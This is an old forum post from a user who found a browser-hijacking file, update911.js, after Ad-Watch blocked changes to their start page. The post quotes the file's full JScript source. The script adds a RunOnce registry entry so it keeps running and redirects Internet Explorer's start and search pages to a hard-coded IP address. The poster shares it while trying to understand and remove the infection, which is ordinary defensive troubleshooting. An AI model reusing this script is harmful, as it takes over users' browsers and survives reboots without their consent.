Javascript homepage hijacker

SKiller

Senior member
Oct 10, 1999
660
0
0
Just opened Ad-Watch (from Ad-Aware) and it detected 3 attempted homepage hijacks:

12/9/2003 10:15:08 PM - Registry modification detected
Root:HKEY_CURRENT_USER
Key:Software\Microsoft\Internet Explorer\Main
Value:Start Page
Data:http://www.google.com/
New Data:http://81.211.105.9/index.php?v=1
Possible browser hijack attempt (Blocked)

Curious, I ran an updated Ad-Aware scan, Spybot scan, and Anti-virus scan with AVG. None of them found any problems. So I ran a search for files containing that IP (81.211.105.9) as text and found a file called update911.js in my Windows folder. It contained the follwing:

var url = "http://81.211.105.9/index.php?v=1";
var burl = "http://81.211.105.9/search.php?v=1";
var fso = new ActiveXObject("Scripting.FileSystemObject");
var tfolder = fso.GetSpecialFolder(0);
var filepath = tfolder + "\\update911.js";
var Shell = new ActiveXObject("WScript.Shell");
Shell.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\tlc",filepath);
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page",url);
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Search Page",url);
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Search Bar",burl);
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Use Search Asst","no");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Use Custom Search URL",1,"REG_DWORD");

I also opened my Internet Options to find the Internet Security zone set to "Low" when I distinctly remember setting it to "Medium".

Obviously I removed the file, but I'm concerned as to how it got there or why it wasn't detected as a threat. Could it be something that wasn't completely removed by Ad-Aware, or something that they don't know about yet? Anyone more familiar with Javascript have any ideas?